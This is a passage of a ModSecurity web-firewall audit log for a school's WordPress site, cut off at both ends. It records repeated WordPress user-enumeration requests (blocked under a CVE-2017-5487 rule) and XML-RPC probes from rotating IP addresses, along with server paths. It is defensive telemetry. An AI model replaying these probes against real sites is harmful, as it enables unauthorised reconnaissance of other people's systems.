"CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432913454507 4664 (- - -) Stopwatch2: 1747432913454507 4664; combined=3595, p1=446, p2=2950, p3=24, p4=25, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0256730-Z-- --ff94be27-A-- [17/May/2025:05:02:30 +0700] aCe19hKi5m5upc8uMd6eOwAAANY 103.236.140.4 56326 103.236.140.4 8181 --ff94be27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ff94be27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff94be27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432950606602 3052 (- - -) Stopwatch2: 1747432950606602 3052; combined=1282, p1=430, p2=822, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff94be27-Z-- --b3beb873-A-- [17/May/2025:05:02:34 +0700] aCe1-nyxdQCiyU1ENFciRgAAAAw 103.236.140.4 56330 103.236.140.4 8181 --b3beb873-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b3beb873-C-- demo.sayHello --b3beb873-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3beb873-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432954462401 4894 (- - -) Stopwatch2: 1747432954462401 4894; combined=3705, p1=449, p2=3054, p3=24, p4=25, p5=91, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3beb873-Z-- --d5215a4d-A-- [17/May/2025:05:03:57 +0700] aCe2TXyxdQCiyU1ENFciSAAAABA 103.236.140.4 56340 103.236.140.4 8181 --d5215a4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d5215a4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5215a4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433037005365 3289 (- - -) Stopwatch2: 1747433037005365 3289; combined=1301, p1=462, p2=810, p3=0, p4=0, p5=29, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5215a4d-Z-- --8cda6c2c-A-- [17/May/2025:05:04:00 +0700] aCe2UBKi5m5upc8uMd6ePAAAANc 103.236.140.4 56342 103.236.140.4 8181 --8cda6c2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8cda6c2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cda6c2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433040475823 3291 (- - -) Stopwatch2: 1747433040475823 3291; combined=1380, p1=493, p2=852, p3=0, p4=0, p5=35, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cda6c2c-Z-- --47380712-A-- [17/May/2025:05:04:04 +0700] aCe2VHyxdQCiyU1ENFciSgAAABI 103.236.140.4 56348 103.236.140.4 8181 --47380712-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.217 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47380712-C-- demo.sayHello --47380712-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47380712-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433044117853 4401 (- - -) Stopwatch2: 1747433044117853 4401; combined=3469, p1=435, p2=2839, p3=22, p4=24, p5=88, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47380712-Z-- --4dc7126b-A-- [17/May/2025:05:04:04 +0700] aCe2VHyxdQCiyU1ENFciSwAAABM 103.236.140.4 56350 103.236.140.4 8181 --4dc7126b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4dc7126b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dc7126b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433044584248 2152 (- - -) Stopwatch2: 1747433044584248 2152; combined=976, p1=318, p2=627, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dc7126b-Z-- --78ac1174-A-- [17/May/2025:05:04:06 +0700] aCe2VhKi5m5upc8uMd6ePgAAAMA 103.236.140.4 56352 103.236.140.4 8181 --78ac1174-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78ac1174-C-- demo.sayHello --78ac1174-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78ac1174-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433046598868 6050 (- - -) Stopwatch2: 1747433046598868 6050; combined=4488, p1=570, p2=3709, p3=31, p4=33, p5=86, sr=80, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78ac1174-Z-- --4eda2479-A-- [17/May/2025:05:04:09 +0700] aCe2WQTOsBn9MSWb6WJqDAAAAI4 103.236.140.4 56360 103.236.140.4 8181 --4eda2479-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4eda2479-C-- demo.sayHello --4eda2479-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4eda2479-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433049338737 4848 (- - -) Stopwatch2: 1747433049338737 4848; combined=3758, p1=497, p2=3025, p3=22, p4=23, p5=108, sr=107, sw=83, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eda2479-Z-- --a8f2d504-A-- [17/May/2025:05:05:31 +0700] aCe2qwTOsBn9MSWb6WJqDQAAAI8 103.236.140.4 56376 103.236.140.4 8181 --a8f2d504-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8f2d504-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8f2d504-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433131479648 3110 (- - -) Stopwatch2: 1747433131479648 3110; combined=1354, p1=513, p2=811, p3=0, p4=0, p5=29, sr=147, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8f2d504-Z-- --16695354-A-- [17/May/2025:05:05:36 +0700] aCe2sATOsBn9MSWb6WJqDwAAAJI 103.236.140.4 56380 103.236.140.4 8181 --16695354-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --16695354-C-- demo.sayHello --16695354-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --16695354-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433136364622 5176 (- - -) Stopwatch2: 1747433136364622 5176; combined=3922, p1=501, p2=3204, p3=24, p4=27, p5=96, sr=120, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16695354-Z-- --369c310b-A-- [17/May/2025:05:06:28 +0700] aCe25ATOsBn9MSWb6WJqEAAAAJM 103.236.140.4 56392 103.236.140.4 8181 --369c310b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --369c310b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --369c310b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433188921777 2860 (- - -) Stopwatch2: 1747433188921777 2860; combined=1263, p1=457, p2=776, p3=0, p4=0, p5=30, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --369c310b-Z-- --ab1de31b-A-- [17/May/2025:05:06:34 +0700] aCe26gTOsBn9MSWb6WJqEgAAAJY 103.236.140.4 56396 103.236.140.4 8181 --ab1de31b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ab1de31b-C-- demo.sayHello --ab1de31b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab1de31b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433194413693 5001 (- - -) Stopwatch2: 1747433194413693 5001; combined=3771, p1=453, p2=3100, p3=29, p4=22, p5=97, sr=67, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab1de31b-Z-- --b2453b25-A-- [17/May/2025:05:07:14 +0700] aCe3EgTOsBn9MSWb6WJqFQAAAIM 103.236.140.4 56404 103.236.140.4 8181 --b2453b25-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2453b25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2453b25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433234159479 2820 (- - -) Stopwatch2: 1747433234159479 2820; combined=1239, p1=427, p2=782, p3=0, p4=0, p5=29, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2453b25-Z-- --2e856961-A-- [17/May/2025:05:07:19 +0700] aCe3FwTOsBn9MSWb6WJqGQAAAIU 103.236.140.4 56414 103.236.140.4 8181 --2e856961-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e856961-C-- demo.sayHello --2e856961-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e856961-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433239654456 5175 (- - -) Stopwatch2: 1747433239654456 5175; combined=3975, p1=455, p2=3175, p3=24, p4=22, p5=162, sr=71, sw=137, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e856961-Z-- --38137d13-A-- [17/May/2025:05:08:14 +0700] aCe3ThKi5m5upc8uMd6eQAAAAMM 103.236.140.4 56428 103.236.140.4 8181 --38137d13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --38137d13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38137d13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433294512242 3129 (- - -) Stopwatch2: 1747433294512242 3129; combined=1359, p1=497, p2=827, p3=0, p4=0, p5=35, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38137d13-Z-- --b24c9413-A-- [17/May/2025:05:08:20 +0700] aCe3VBKi5m5upc8uMd6eQgAAAMc 103.236.140.4 56432 103.236.140.4 8181 --b24c9413-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b24c9413-C-- demo.sayHello --b24c9413-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b24c9413-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433300432719 5174 (- - -) Stopwatch2: 1747433300432719 5174; combined=3517, p1=511, p2=2824, p3=32, p4=34, p5=69, sr=63, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b24c9413-Z-- --62a2d17e-A-- [17/May/2025:05:08:51 +0700] aCe3cwTOsBn9MSWb6WJqHAAAAI4 103.236.140.4 56436 103.236.140.4 8181 --62a2d17e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --62a2d17e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62a2d17e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 